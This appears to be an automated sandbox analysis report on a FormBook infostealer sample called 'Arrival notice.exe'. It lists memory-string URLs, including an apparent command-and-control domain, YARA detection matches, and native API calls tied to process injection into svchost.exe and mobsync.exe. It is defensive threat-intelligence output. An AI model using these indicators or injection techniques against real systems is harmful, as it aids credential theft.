            Source: mobsync.exe, 0000000C.00000003.1913188921.0000000007B5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.albero-dveri.online&rand=
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.00000000070E4000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.0000000005404000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003FBA4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfF
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: mobsync.exe, 0000000C.00000003.1919141339.0000000007B7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_lan
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.albero-dveri.online&utm_medium=parking&utm_campaign=s_l
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.albero-dveri.online&utm_medium=parking&
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.000000000822A000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000654A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.albero-dveri.online&amp;reg_source=parking_auto

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3747714326.0000000002D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3758373668.0000000009130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1730283884.0000000008C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1724645368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3746700176.0000000002CC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1725426506.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3750353258.0000000003960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Arrival notice.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042C883 NtClose,9_2_0042C883
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036735C0 NtCreateMutant,LdrInitializeThunk,9_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B60 NtClose,LdrInitializeThunk,9_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674340 NtSetContextThread,9_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673010 NtOpenDirectoryObject,9_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673090 NtSetValueKey,9_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03674650 NtSuspendThread,9_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BE0 NtQueryValueKey,9_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BF0 NtAllocateVirtualMemory,9_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672BA0 NtEnumerateValueKey,9_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672B80 NtQueryInformationFile,9_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AF0 NtWriteFile,9_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AD0 NtReadFile,9_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672AB0 NtWaitForSingleObject,9_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036739B0 NtGetContextThread,9_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F60 NtCreateProcessEx,9_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F30 NtCreateSection,9_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FE0 NtCreateFile,9_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FA0 NtQuerySection,9_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672FB0 NtResumeThread,9_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672F90 NtProtectVirtualMemory,9_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E30 NtWriteVirtualMemory,9_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EE0 NtQueueApcThread,9_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672EA0 NtAdjustPrivilegesToken,9_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672E80 NtReadVirtualMemory,9_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D70 NtOpenThread,9_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D30 NtUnmapViewOfSection,9_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D00 NtSetInformationFile,9_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672D10 NtMapViewOfSection,9_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03673D10 NtOpenProcessToken,9_2_03673D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DD0 NtDelayExecution,9_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672DB0 NtEnumerateKey,9_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C60 NtCreateKey,9_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C70 NtFreeVirtualMemory,9_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672C00 NtQueryInformationProcess,9_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CF0 NtOpenProcess,9_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CC0 NtQueryVirtualMemory,9_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03672CA0 NtQueryInformationToken,9_2_03672CA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A635C0 NtCreateMutant,LdrInitializeThunk,12_2_04A635C0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A64650 NtSuspendThread,LdrInitializeThunk,12_2_04A64650
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A64340 NtSetContextThread,LdrInitializeThunk,12_2_04A64340
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_04A62CA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62C60 NtCreateKey,LdrInitializeThunk,12_2_04A62C60
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04A62C70
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_04A62DF0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62DD0 NtDelayExecution,LdrInitializeThunk,12_2_04A62DD0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_04A62D30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62D10 NtMapViewOfSection,LdrInitializeThunk,12_2_04A62D10
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62EE0 NtQueueApcThread,LdrInitializeThunk,12_2_04A62EE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62FB0 NtResumeThread,LdrInitializeThunk,12_2_04A62FB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62FE0 NtCreateFile,LdrInitializeThunk,12_2_04A62FE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62F30 NtCreateSection,LdrInitializeThunk,12_2_04A62F30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A639B0 NtGetContextThread,LdrInitializeThunk,12_2_04A639B0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62AF0 NtWriteFile,LdrInitializeThunk,12_2_04A62AF0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62AD0 NtReadFile,LdrInitializeThunk,12_2_04A62AD0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62B60 NtClose,LdrInitializeThunk,12_2_04A62B60
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A63090 NtSetValueKey,12_2_04A63090
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A63010 NtOpenDirectoryObject,12_2_04A63010
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62CF0 NtOpenProcess,12_2_04A62CF0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62CC0 NtQueryVirtualMemory,12_2_04A62CC0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62C00 NtQueryInformationProcess,12_2_04A62C00
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62DB0 NtEnumerateKey,12_2_04A62DB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62D00 NtSetInformationFile,12_2_04A62D00
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A63D10 NtOpenProcessToken,12_2_04A63D10
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A63D70 NtOpenThread,12_2_04A63D70
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62EA0 NtAdjustPrivilegesToken,12_2_04A62EA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62E80 NtReadVirtualMemory,12_2_04A62E80
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62E30 NtWriteVirtualMemory,12_2_04A62E30
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62FA0 NtQuerySection,12_2_04A62FA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62F90 NtProtectVirtualMemory,12_2_04A62F90
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62F60 NtCreateProcessEx,12_2_04A62F60
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62AB0 NtWaitForSingleObject,12_2_04A62AB0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62BA0 NtEnumerateValueKey,12_2_04A62BA0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62B80 NtQueryInformationFile,12_2_04A62B80
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62BE0 NtQueryValueKey,12_2_04A62BE0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A62BF0 NtAllocateVirtualMemory,12_2_04A62BF0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_008090F0 NtCreateFile,12_2_008090F0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_00809260 NtReadFile,12_2_00809260
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_008093F0 NtClose,12_2_008093F0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_00809350 NtDeleteFile,12_2_00809350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004189739_2_00418973
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401A2C9_2_00401A2C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004029109_2_00402910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004031F09_2_004031F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004102C39_2_004102C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004102BB9_2_004102BB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00416B639_2_00416B63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00401C439_2_00401C43
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004104E39_2_004104E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040E5639_2_0040E563
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004026409_2_00402640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042EE939_2_0042EE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362D34C9_2_0362D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FA3529_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F132D9_2_036F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364E3F09_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037003E69_2_037003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0368739A9_2_0368739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E02749_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C09_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A09_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367516C9_2_0367516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F1729_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370B16B9_2_0370B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036301009_2_03630100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DA1189_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F81CC9_2_036F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364B1B09_2_0364B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037001AA9_2_037001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F70E99_2_036F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF0E09_2_036FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF0CC9_2_036EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036470C09_2_036470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036407709_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036647509_2_03664750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036317EC9_2_036317EC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363C7C09_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF7B09_2_036FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365C6E09_2_0365C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F16CC9_2_036F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F75719_2_036F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036405359_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DD5B09_2_036DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037005919_2_03700591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036314609_2_03631460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F24469_2_036F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FF43F9_2_036FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EE4F69_2_036EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFB769_2_036FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0367DBF99_2_0367DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F6BD79_2_036F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365FB809_2_0365FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B3A6C9_2_036B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFA499_2_036FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F7A469_2_036F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EDAC69_2_036EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036DDAAC9_2_036DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03685AA09_2_03685AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363EA809_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036569629_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036499509_2_03649950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B9509_2_0365B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036429A09_2_036429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0370A9A69_2_0370A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364A8409_2_0364A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036438E09_2_036438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E8F09_2_0366E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036268B89_2_036268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B4F409_2_036B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03682F289_2_03682F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03660F309_2_03660F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFF099_2_036FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364CFE09_2_0364CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03632FC89_2_03632FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FFFB19_2_036FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03641F929_2_03641F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640E599_2_03640E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FEE269_2_036FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FEEDB9_2_036FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03649EB09_2_03649EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03652E909_2_03652E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036FCE939_2_036FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F7D739_2_036F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03643D409_2_03643D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F1D5A9_2_036F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0364AD009_2_0364AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363ADE09_2_0363ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365FDC09_2_0365FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03658DBF9_2_03658DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B9C329_2_036B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03640C009_2_03640C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03630CF29_2_03630CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E0CB59_2_036E0CB5
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0918A8FC11_2_0918A8FC
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091743DC11_2_091743DC
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916BD2411_2_0916BD24
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916BD2C11_2_0916BD2C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_09170D6C11_2_09170D6C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_091725CC11_2_091725CC
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_0916BF4C11_2_0916BF4C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exeCode function: 11_2_09169FCC11_2_09169FCC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ADE4F612_2_04ADE4F6
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEF43F12_2_04AEF43F
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A2146012_2_04A21460
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE244612_2_04AE2446
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ACD5B012_2_04ACD5B0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AF059112_2_04AF0591
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3053512_2_04A30535
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE757112_2_04AE7571
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A4C6E012_2_04A4C6E0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE16CC12_2_04AE16CC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEF7B012_2_04AEF7B0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A217EC12_2_04A217EC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A2C7C012_2_04A2C7C0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3077012_2_04A30770
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A5475012_2_04A54750
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE70E912_2_04AE70E9
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AEF0E012_2_04AEF0E0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ADF0CC12_2_04ADF0CC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A370C012_2_04A370C0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AF01AA12_2_04AF01AA
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A3B1B012_2_04A3B1B0
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04AE81CC12_2_04AE81CC
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04A2010012_2_04A20100
            Source: C:\Windows\SysWOW64\mobsync.exeCode function: 12_2_04ACA11812_2_04ACA118
